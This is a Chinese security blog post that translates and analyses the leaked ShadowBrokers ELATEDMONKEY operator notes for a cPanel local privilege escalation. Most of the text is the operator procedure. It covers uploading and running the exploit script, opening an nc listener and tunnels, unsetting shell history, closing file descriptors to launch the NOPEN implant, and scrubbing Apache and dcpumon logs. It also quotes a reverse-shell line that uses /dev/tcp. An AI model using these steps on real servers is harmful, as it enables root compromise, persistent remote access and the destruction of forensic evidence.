专注:网络安全、系统安全、应用安全、数据库安全、运维安全,趋势分析。

安全从业者2000人超级群:187297569 沟通:1255197 技术:75140776 北京:107606822 西安:53210718 渗透:50806427 站长QQ:55984512


ShadowBrokers公开文件之elatedmonkey利用分析

2017-04-13 14:39 推荐: 浏览: 93 views 评论 字号:

摘要: 注:ShadowBrokers,是一个黑客组织,成立于2016年夏天。ELATEDMONKEY 是cPanel的本地提权漏洞。 翻译:极限帽儿 elatedmonkey是针对运行的cPanel远程管理的Web界面系统的本地提权攻击,已经通杀24个版本。在cPa...

注:ShadowBrokers,是一个黑客组织,成立于2016年夏天。ELATEDMONKEY 是cPanel的本地提权漏洞。

翻译:极限帽儿

elatedmonkey是针对运行的cPanel远程管理的Web界面系统的本地提权攻击,已经通杀24个版本。在cPanel 11.23.3和11.24.4运行CentOS Linux 5.2已经明确的测试成功。

第一步:以普通用户身份登录,然后在shell中运行脚本。

第二步:分析你权限以及填写的输入框的类型。

pwd

-cd WORKING_DIR

date; date -u; id

uname –a

如果你是nobody用户,ELATEDMONKEY就可以直接起作用了,如果你是一个普通用户,ELATEDMONKEY只能以nobody身份执行Apache执行脚本

第三步:检查这漏洞是否可用

#或许应该添加一步来检查确保以nobody身份执行Apache执行脚本,但这将需要开发人员参与,作者没写完先占个位置

第四步:上传脚本文件和检查其内容

-put PATH_TO_ELATEDMONKEY_EXECUTABLE e.sh

-lt e.sh

为了使清消除痕迹更容易些,在你执行漏洞之前设置timestamp;

在目标机器上打开至少两个窗口,一个执行漏洞攻击,另一个设置连接隧道

在第二个窗口中输入:

-tunnel

r RHP1

在重定向窗口:

-nrtun RHP2

在攻击机器脚本窗口中输入:

nc -v -l -p RHP1

在你的攻击窗口:

-shell

unset HISTFILE

unset HISTSIZE

unset HISTFILESIZE

id

date; date -u

sh e.sh -s 127.0.0.1 RHP1 ; date

检查端口隧道的连接和nc上面建立的连接

检查你是否是root权限

unset HISTFILE

unset HISTSIZE

unset HISTFILESIZE

id

date; date -u

pwd

cd WORKING_DIR ; pwd

由于NOPEN限制,我们需要确保我们所有的文件描述符是封闭的,所以这是怎么做的。下面的线条被设计为复制和粘贴,但最好是减少干扰:

MY_PID=`echo -n $$` ls -lart /proc/$MY_PID/fd/

一旦你得到一个pid列表,除了0 、1 、2的其他都关闭。

exec 4>&- 5>&- 6>&- 7>&- 8>&-9>&- 10>&- 11>&-

当你运行nopen,关闭剩余的文件描述符。

PATH=. D=-cREDIRECTOR_IP:REDIRECTOR_PORT NOPEN_ON_TARGET 0>&-1>&- 2>&-

清除日志

/usr/local/apache/logs/suexec_log

[2009-01-09 05:54:15]: uid: (mailman/mailman) gid: (mailman/mailman)cmd: config_list

/usr/local/apache/logs/access_log

127.0.0.1 – – [09/Jan/2009:05:52:32 -0500] “GET /~USER/info.phpHTTP/1.0” 200 80

/usr/local/apache/logs/error_log

attribute “os”ignored

also errors fromcommands you run

/var/log/dcpumon/toplog.*

/var/log/dcpumon/<YEAR>/<MONTH>/<DAY>

Dcpumon logs processlists and system usage in the every 5 minutes. Any

commands executed on thesystem could end up in these logs. Remove any

references to commandssuch as ‘e.sh’,

‘/bin/sh -c /bin/sh >/dev/tcp/1.1.1.1/80 >&0 2>&0’, and

‘/usr/local/apache/bin/suexec mailman mailman config_list -c -i/dev/shm/mem mailman’

END

深圳市极限网络科技有限公司(简称“极限网络”)成立于2009年4月,是一家专注智能机器人与安全系统集成的专业网络安全公司,成立至今为我国关键信息基础设施、重要政府部门、大型企事业单位及重点行业提供了全面、专业的网络安全解决方案。

联系站长租广告位!

中国首席信息安全官


关闭


关闭